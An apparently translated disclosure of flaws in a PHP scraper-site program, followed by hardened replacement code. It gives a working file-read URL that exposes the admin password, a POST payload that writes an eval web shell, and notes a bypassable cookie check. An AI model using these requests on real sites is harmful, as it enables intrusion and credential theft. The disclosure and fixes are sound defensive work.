If I plan to use the thief program as a website, I will download a set of programs and the results will be tragic.
: Http://www.bkjia.com/ym/201203/31432.html
1. Arbitrary file read vulnerability in the front end:
img.php file code:
<?php
// $p comes straight from the query string and is used with no validation
$p = $_GET['p'];
$pics = file($p);
for ($i = 0; $i < count($pics); $i++)
{
    echo $pics[$i];
}
?>
A typical arbitrary file read: the p parameter is passed to file() without any verification.
Usage: /img.php?p=./admin/data.php
This reads the administrator account password in plaintext.
2. Arbitrary code write in the back end:
The last code snippet of admin_ad.php:
<?
} elseif ($_GET['action'] = "add") {
    // echo $_POST['js_mb'];
    // both the file name and the file content are taken from the POST body
    $file = "../ad/" . $_POST['js_file'];
    $fp = fopen($file, "w");
    fwrite($fp, stripslashes($_POST['js_mb']));
    fclose($fp);
    echo "<script>alert('modification successful!');location.href='?id=ad';</script>";
}
?>
Send the POST data:
Path: /admin/admin_ad.php?action=add
POST data: js_file=x.php&js_mb=<?php eval($_POST[cmd]);?>
This creates x.php, a one-line web shell with the password cmd, in the website's ad directory.
This verification header is missing from the file:
<?
include('data.php');
if ($_COOKIE['x_cooker'] != $adminname and $_COOKIE['y_cooker'] != $password) {
    echo "<script>location.href='index.php';</script>";
    exit;
}
?>
Anyone who spots the logic error in this check can bypass it.
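Hardened forms of the three checks discussed above, as an added example that is not part of the original program or post. The constants IMAGE_DIR and AD_DIR, the function names, and the assumption that ad snippets are .js files are illustrative, not taken from the program.

```php
<?php
// Added example: IMAGE_DIR, AD_DIR and all function names are assumptions.
const IMAGE_DIR = __DIR__ . '/images';
const AD_DIR    = __DIR__ . '/ad';

// img.php: serve a file only if it resolves inside IMAGE_DIR and is an image.
function resolve_image(string $p): ?string
{
    $base = realpath(IMAGE_DIR);
    $path = realpath(IMAGE_DIR . '/' . $p);   // collapses ../ and symlinks
    if ($base === false || $path === false) {
        return null;                          // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                          // resolved outside the image directory
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true) ? $path : null;
}

// Admin check: the request is accepted only when BOTH cookies match.
// The original condition joined the two mismatches with "and", so it
// redirected only when both values were wrong.
function is_admin(array $cookies, string $adminname, string $password): bool
{
    $x = $cookies['x_cooker'] ?? '';
    $y = $cookies['y_cooker'] ?? '';
    return is_string($x) && is_string($y)
        && hash_equals($adminname, $x)        // constant-time comparison
        && hash_equals($password, $y);
}

// admin_ad.php: accept only a bare .js file name, so the target cannot
// leave AD_DIR and cannot carry an extension the server executes as PHP.
function ad_target(string $jsFile): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.js\z/', $jsFile)) {
        return null;
    }
    return AD_DIR . '/' . $jsFile;
}
```

admin_ad.php would call is_admin($_COOKIE, $adminname, $password) before any branch runs and write only when ad_target() returns a path. Keeping the password itself in a cookie remains weak; a server-side session is the better replacement.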